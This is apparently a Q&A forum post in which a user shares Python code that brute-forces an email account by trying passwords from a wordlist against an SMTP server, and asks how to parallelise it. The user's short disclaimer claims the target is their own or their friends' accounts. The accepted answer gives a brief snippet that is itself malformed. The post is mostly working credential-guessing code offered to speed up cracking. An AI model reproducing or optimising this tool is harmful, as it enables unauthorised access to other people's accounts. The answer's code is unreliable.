# Parallel compute task to brute-force in python

Tags: python, python-2.7, python-3.x, python-multiprocessing, concurrent.futures

/* This is not for anything illegal just that my school only uses 7 integers, and I want to see if I can get this to work in time as currently I need 1.59 years to crack a password. The school has it's own private server on site for anyone concerned and it's easily detectable. I'll do this only to me or my friends with their permission .*/

I just wanted to use multi processing or concurrent.futures to make this password cracker run in reasonable time.

Here is my attempt at paralleling it

```
import smtplib
from concurrent.futures import ThreadPoolExecutor
def conn():
    print("Got to here3")
    smtpserver.connect('private_email_server', 587)
    smtpserver.ehlo()
    smtpserver.starttls()
    print("OK going to main")
    main()
def main():
    for password in passwfile.readlines():
        password = password.strip()
        print("Go to here1")
        try:
            print("WELL AT LEAST WE GOT HERE")
            smtpserver.login('myemail@private_email.com', password)
            a = password
            with open('pass.txt','w') as bc:
                bc.write(a)
            print ("[+] Password cracked----> %s" % password)
            input()
            break
        except smtplib.SMTPAuthenticationError:
            print("[-] Wrong --> %s" % password)   
            pass
        except:
            print("Got to here2")
            conn()
if __name__ == '__main__':


    passwfile = open('per.txt', 'r')
    smtpserver = smtplib.SMTP()

    with ThreadPoolExecutor(max_workers=3) as exe:
        exe.submit(conn)
```

This actually works only if the password is in the first line it, it only outputs the indicators i wrote on there like `print ("Got to here3")` It doesn't print the cracked password or even write it to a text file.

Answer (score 2, accepted):

Have you tried

```
with ThreadPoolExecutor as exe:
    exe.submit(conn)
```

It maybe that you aren't actually connected to the server